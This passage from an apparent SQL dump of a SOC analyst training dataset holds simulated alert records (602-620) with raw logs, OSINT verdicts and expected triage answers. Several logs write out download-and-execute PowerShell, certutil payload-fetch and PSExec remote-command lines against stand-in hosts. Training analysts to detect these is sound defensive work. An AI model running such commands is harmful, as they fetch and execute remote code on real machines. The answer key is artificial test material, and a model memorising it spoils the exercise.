'{\"timestamp\":\"2026-01-11T08:30:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"45.67.89.123\",\"dst_ip\":\"192.168.1.10\",\"username\":\"admin\",\"hostname\":\"corp-server-01\",\"failed_attempts\":34}', '2026-01-11 14:04:23', '2026-01-11 14:04:23', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"45.67.89.123\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The high number of failed login attempts from a known malicious IP strongly indicates a brute force attempt.\"}', 'Novice', 'SIEM', 1, 1, 'OT_ICS'), (602, 'Malware Detected via Suspicious Process Execution', 'critical', 'CrowdStrike', 'A known malware file was executed on a company workstation. The file hash matches a sample with widespread detection on VirusTotal.', 'Malware', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T09:15:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.22\",\"username\":\"jdoe\",\"hostname\":\"workstation-55\",\"command_line\":\"C:\\\\malware\\\\bad.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-01-11 14:04:23', '2026-01-11 14:04:23', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash detected by 60 security vendors\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.22\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address\"}}],\"expected_actions\":[\"block_hash\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Execution of a file with a known malicious hash indicates a malware infection.\"}', 'Novice', 'EDR', 1, 1, 'OT_ICS'), (603, 'Phishing Email Containing Malicious URL', 'high', 'Proofpoint', 'A phishing email containing a malicious URL was received. The URL is known for hosting malware.', 'Phishing', 'T1566', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T10:05:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.50\",\"dst_ip\":\"192.168.1.50\",\"username\":\"jsmith\",\"hostname\":\"mail-server-01\",\"email_sender\":\"spoofed@malicious.com\",\"url\":\"http://bad-url.com\"}', '2026-01-11 14:04:23', '2026-01-11 14:04:23', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"spoofed@malicious.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Email address associated with phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://bad-url.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL hosts known malware\"}}],\"expected_actions\":[\"block_ip\",\"block_url\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The presence of a malicious URL in the email indicates a phishing attempt aimed at compromising user credentials.\"}', 'Novice', 'NDR', 1, 1, 'GOVERNMENT'), (604, 'False Positive: Legitimate User Activity Mistaken for Malicious', 'low', 'Firewall', 'A legitimate user accessing an external service was flagged as suspicious due to an incorrect firewall rule.', 'Network Traffic', 'T1040', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T11:30:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.100\",\"dst_ip\":\"104.26.2.33\",\"username\":\"mgomez\",\"hostname\":\"laptop-34\",\"domain\":\"example.com\"}', '2026-01-11 14:04:23', '2026-01-11 14:04:23', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"104.26.2.33\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"No malicious activity reported for this IP\"}},{\"id\":\"artifact_3\",\"type\":\"domain\",\"value\":\"example.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"Reputable domain with no malicious history\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"network_traffic\",\"analysis_notes\":\"The connection was flagged due to an overly restrictive firewall rule, not because of any real threat.\"}', 'Novice', 'NDR', 1, 1, 'OT_ICS'), (605, 'Suspicious PowerShell Execution Detected', 'high', 'CrowdStrike', 'A PowerShell command was executed on the host which is commonly associated with malicious activity. The command attempts to download a file from an external IP address.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T10:15:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"hostname\":\"DESKTOP-01\",\"command_line\":\"powershell.exe -nop -w hidden -c \\\"IEX (New-Object Net.WebClient).DownloadString(\'http://203.0.113.45/malicious.ps1\')\\\"\",\"file_hash\":\"abcd1234efgh5678ijkl9012mnop3456\",\"domain\":\"malicious-site.com\"}', '2026-01-11 14:05:25', '2026-01-11 14:05:25', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 123 times for hosting malicious scripts\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"abcd1234efgh5678ijkl9012mnop3456\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash detected in 5/5 antivirus engines\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"powershell.exe -nop -w hidden -c \\\"IEX (New-Object Net.WebClient).DownloadString(\'http://203.0.113.45/malicious.ps1\')\\\"\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Command pattern associated with fileless malware\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The PowerShell command and the external IP address are both indicators of a malicious activity. Immediate action is required.\"}', 'Beginner', 'EDR', 3, 1, 'GOVERNMENT'), (606, 'Failed Login Attempts from Foreign IP', 'medium', 'Splunk', 'Multiple failed login attempts detected from an external IP address, indicating a possible brute force attack.', 'Brute Force', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T03:45:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"198.51.100.25\",\"dst_ip\":\"\",\"username\":\"admin\",\"hostname\":\"WEB-SERVER-01\",\"failed_attempts\":35}', '2026-01-11 14:05:25', '2026-01-11 14:05:25', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Common username targeted in brute force attempts\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The high number of failed login attempts from a foreign IP address indicates a likely brute force attack.\"}', 'Beginner', 'SIEM', 3, 1, 'OT_ICS'), (607, 'Phishing Email with Malicious URL Detected', 'high', 'Proofpoint', 'A phishing email was received containing a malicious URL, attempting to trick the user into visiting a fake login page.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T08:00:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.55\",\"dst_ip\":\"10.0.0.15\",\"username\":\"asmith\",\"hostname\":\"MAIL01\",\"email_sender\":\"no-reply@fakesite.com\",\"url\":\"http://fakesite.com/login\"}', '2026-01-11 14:05:25', '2026-01-11 14:05:25', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://fakesite.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL known for hosting phishing pages\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"no-reply@fakesite.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"EmailRep\",\"verdict\":\"suspicious\",\"details\":\"Domain recently registered, associated with phishing\"}}],\"expected_actions\":[\"block_ip\",\"block_url\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email contains a malicious URL leading to a phishing page. The sender\'s domain is not legitimate.\"}', 'Beginner', 'SIEM', 3, 1, 'GOVERNMENT'), (608, 'Unusual Login Activity Detected from Known VPN Provider', 'low', 'Wazuh', 'A login attempt was detected from an IP address associated with a known VPN provider. The activity appears benign after further investigation.', 'Suspicious Login', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T09:30:00Z\",\"event_type\":\"login_success\",\"src_ip\":\"192.0.2.10\",\"dst_ip\":\"192.168.1.5\",\"username\":\"jsmith\",\"hostname\":\"LAPTOP-02\"}', '2026-01-11 14:05:25', '2026-01-11 14:05:25', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.0.2.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"IP associated with benign VPN provider\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The IP address is associated with a legitimate VPN provider, and the login activity matches a known user\'s behavior.\"}', 'Beginner', 'SIEM', 3, 1, 'GOVERNMENT'), (609, 'Suspicious PowerShell Execution Detected', 'high', 'CrowdStrike', 'A suspicious PowerShell script was executed on an internal machine. This script is known to download additional malware.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T08:45:23Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"\",\"username\":\"jdoe\",\"hostname\":\"INTERNAL-PC01\",\"command_line\":\"powershell.exe -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString(\'http://malicious.example.com\')\",\"file_hash\":\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\"}', '2026-01-11 01:10:03', '2026-01-11 14:06:08', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address, not exposed to the internet.\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell.exe -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString(\'http://malicious.example.com\')\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Known malicious PowerShell command to download and execute scripts.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash detected in multiple malware campaigns.\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The PowerShell command is a known indicator of compromise for malware download and execution.\"}', 'Intermediate', 'EDR', 5, 1, 'OT_ICS'), (610, 'Phishing Email with Malicious Link Detected', 'critical', 'Proofpoint', 'A phishing email containing a link to a known malicious domain was received by a user.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T09:30:45Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.50\",\"dst_ip\":\"192.168.1.20\",\"username\":\"asmith\",\"hostname\":\"MAIL-SERVER\",\"email_sender\":\"phish@evil.com\",\"url\":\"http://phishing.example.com\",\"email_subject\":\"Urgent: Verify Your Account\"}', '2026-01-10 21:27:24', '2026-01-11 14:06:08', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for phishing activities.\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"phish@evil.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Spamhaus\",\"verdict\":\"malicious\",\"details\":\"Email address linked to phishing campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://phishing.example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL associated with phishing schemes.\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email contains a link to a malicious site, confirmed by multiple OSINT sources.\"}', 'Intermediate', 'NDR', 5, 1, 'GOVERNMENT'), (611, 'Internal Network Lateral Movement via PSExec', 'medium', 'Wazuh', 'A suspicious PSExec activity was detected moving laterally within the network from one internal host to another.', 'Lateral Movement', 'T1077', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T10:15:30Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.15\",\"dst_ip\":\"192.168.1.25\",\"username\":\"admin\",\"hostname\":\"INTERNAL-SERVER\",\"command_line\":\"psexec.exe \\\\\\\\192.168.1.25 -u admin -p password cmd.exe\"}', '2026-01-11 02:27:11', '2026-01-11 14:06:08', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the initiating host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the target host.\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"psexec.exe \\\\\\\\192.168.1.25 -u admin -p password cmd.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"PSExec usage can indicate lateral movement.\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"PSExec used to execute commands remotely, indicating possible lateral movement.\"}', 'Intermediate', 'NDR', 5, 1, 'OT_ICS'), (612, 'Brute Force Login Attempt Detected', 'medium', 'Splunk', 'Multiple failed login attempts were detected from a foreign IP address, indicating a possible brute force attack.', 'Credential Attack', 'T1110', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T11:00:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.30\",\"username\":\"admin\",\"hostname\":\"INTERNAL-SERVER\",\"failed_attempts\":25}', '2026-01-09 19:58:44', '2026-01-11 14:06:08', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP reported in multiple brute force attempts but not confirmed malicious.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Common administrative account targeted by attackers.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The foreign IP showed failed login attempts but without successful access. No further malicious activity detected.\"}', 'Intermediate', 'SIEM', 5, 1, 'OT_ICS'), (613, 'Suspicious PowerShell Execution Detected with Encoded Command', 'high', 'CrowdStrike', 'A PowerShell process was detected executing an encoded command, indicating possible obfuscation attempts to evade detection.', 'Malware', 'T1086', 1, 'New', NULL, '{\"timestamp\":\"2026-01-10T19:45:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.25\",\"dst_ip\":\"\",\"username\":\"jdoe\",\"hostname\":\"DESKTOP-01\",\"request_body\":\"\",\"command_line\":\"powershell.exe -enc JAB3AGgAYQB0ACAAJwAnADsAIAAkAHUAcgBsACAAPQAgACcAaAB0AHQAcAA6AC8ALwBlAHgAYQBtAHAAbABlAC4AYwBvAG0AJwA7ACAAIgAkAHIAZQBwACAAJwAnAA==\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\"}', '2026-01-10 04:01:28', '2026-01-11 14:06:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected machine\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell.exe -enc JAB3AGgAYQB0ACAAJwAnADsAIAAkAHUAcgBsACAAPQAgACcAaAB0AHQAcAA6AC8ALwBlAHgAYQBtAHAAbABlAC4AYwBvAG0AJwA7ACAAIgAkAHIAZQBwACAAJwAnAA==\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell command used for obfuscation detected in multiple malware campaigns\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash seen in recent suspicious activity, but not confirmed malicious\"}}],\"expected_actions\":[\"collect_forensics\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The use of encoded PowerShell commands is a common tactic for malware to evade detection. This activity requires further investigation and containment.\"}', 'Advanced', 'EDR', 7, 1, 'OT_ICS'), (614, 'Internal Network Lateral Movement via PSExec', 'critical', 'Wazuh', 'An internal system was used to execute a remote command on another internal machine using PSExec, indicating potential lateral movement.', 'Lateral Movement', 'T1077', 1, 'New', NULL, '{\"timestamp\":\"2026-01-10T21:12:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.50\",\"dst_ip\":\"192.168.1.75\",\"username\":\"admin\",\"hostname\":\"SERVER-01\",\"command_line\":\"psexec \\\\\\\\192.168.1.75 -u admin -p password123 cmd.exe /c whoami\"}', '2026-01-10 10:01:55', '2026-01-11 14:06:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Source IP of the initiating system within the network\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.75\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Destination IP of the target system within the network\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"psexec \\\\\\\\192.168.1.75 -u admin -p password123 cmd.exe /c whoami\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"PSExec used for lateral movement, a known technique for spreading malware internally\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The use of PSExec for remote command execution is a strong indicator of lateral movement within the network. Immediate investigation and host isolation are advised.\"}', 'Advanced', 'EDR', 7, 1, 'TECH'), (615, 'Potential Data Exfiltration via Certutil', 'high', 'Splunk', 'Certutil was observed being used to download a file from an external source, a technique often used for data exfiltration or downloading malicious payloads.', 'Data Exfil', 'T1140', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T03:25:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.2.100\",\"dst_ip\":\"203.0.113.85\",\"username\":\"hsmith\",\"hostname\":\"WORKSTATION-03\",\"command_line\":\"certutil.exe -urlcache -split -f http://malicious.example.com/payload.exe payload.exe\"}', '2026-01-10 07:17:02', '2026-01-11 14:06:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.100\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected machine\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious.example.com/payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL associated with malware distribution\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"certutil.exe -urlcache -split -f http://malicious.example.com/payload.exe payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Certutil used to download potentially malicious file\"}}],\"expected_actions\":[\"block_ip\",\"block_url\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The use of certutil for downloading files from external sources is indicative of data exfiltration or malware download. Further investigation is necessary.\"}', 'Advanced', 'EDR', 7, 1, 'GOVERNMENT'), (616, 'False Positive: Legitimate Use of MSHTA Detected', 'medium', 'IDS', 'An MSHTA execution was detected, which is commonly used by attackers for executing scripts. However, this instance was identified as a legitimate use case by an internal script.', 'Malware', 'T1218', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T07:40:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.120\",\"dst_ip\":\"\",\"username\":\"serviceaccount\",\"hostname\":\"SERVER-02\",\"command_line\":\"mshta.exe http://intranet.example.com/script.hta\",\"domain\":\"intranet.example.com\"}', '2026-01-10 16:40:24', '2026-01-11 14:06:34', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.120\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the server executing the script\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"mshta.exe http://intranet.example.com/script.hta\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"Legitimate execution of an internal script\"}},{\"id\":\"artifact_3\",\"type\":\"domain\",\"value\":\"intranet.example.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"Internal domain for legitimate business operations\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The detected use of MSHTA was verified to be legitimate for executing an internal script. No malicious activity was confirmed.\"}', 'Advanced', 'EDR', 7, 1, 'OT_ICS'), (617, 'Advanced Persistent Threat Detected: Multi-hop C2 Communication via Slack', 'critical', 'CrowdStrike', 'An APT group has been detected using a multi-hop C2 communication channel through Slack to control a compromised system. The attack involves memory-only payloads and process hollowing techniques.', 'Malware', 'T1095', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T11:00:22Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"203.0.113.200\",\"username\":\"jdoe\",\"hostname\":\"CORP-DESKTOP01\",\"command_line\":\"powershell.exe -nop -w hidden -c IEX ((New-Object Net.WebClient).DownloadString(\'https://slack.com/api/secret\'))\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"domain\":\"slack.com\"}', '2026-01-11 06:23:43', '2026-01-11 14:06:58', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.200\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 1023 times for C2 activities\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"powershell.exe -nop -w hidden -c IEX ((New-Object Net.WebClient).DownloadString(\'https://slack.com/api/secret\'))\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Suspicious PowerShell command indicative of fileless malware\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware sample associated with APT activity\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The use of Slack as a C2 channel and the memory-only payload suggests a sophisticated APT attack leveraging legitimate services.\"}', 'Expert', 'EDR', 9, 1, 'OT_ICS'), (618, 'DGA Domain Detected for Data Exfiltration', 'high', 'Splunk', 'A domain generated algorithmically has been detected, suggesting data exfiltration attempts from an internal server. The domain is associated with fast-flux DNS to evade detection.', 'Data Exfiltration', 'T1071', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T02:45:10Z\",\"event_type\":\"dns_request\",\"src_ip\":\"10.0.0.25\",\"domain\":\"xkjasd1234.info\",\"username\":\"svc-backup\",\"hostname\":\"SRV-BACKUP01\"}', '2026-01-10 18:00:27', '2026-01-11 14:06:58', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the server involved in suspicious DNS requests\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"xkjasd1234.info\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Domain identified as part of a DGA associated with data exfiltration\"}}],\"expected_actions\":[\"block_ip\",\"block_domain\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The DGA domain and fast-flux DNS indicate a sophisticated data exfiltration attempt, likely part of an ongoing APT campaign.\"}', 'Expert', 'SIEM', 9, 1, 'OT_ICS'), (619, 'False Positive: Suspicious Login Attempt from Known Safe Location', 'medium', 'IDS', 'Multiple login failures were detected from an external IP. However, the IP belongs to a known safe location used by a trusted vendor.', 'Credential Attack', 'T1110', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T08:50:42Z\",\"event_type\":\"login_failure\",\"src_ip\":\"198.51.100.44\",\"dst_ip\":\"192.168.100.5\",\"username\":\"jdoe\",\"hostname\":\"CORP-DC01\",\"failed_attempts\":12}', '2026-01-11 00:32:19', '2026-01-11 14:06:58', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.44\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"IP address belongs to a known safe location used by a trusted vendor\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.100.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of domain controller\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The login failures originated from a trusted vendor\'s network, confirming benign activity.\"}', 'Expert', 'SIEM', 9, 1, 'OT_ICS'), (620, 'Phishing Attempt Detected: Spoofed Domain and Malicious URL', 'high', 'Proofpoint', 'A phishing email was received with a spoofed domain and a malicious URL designed 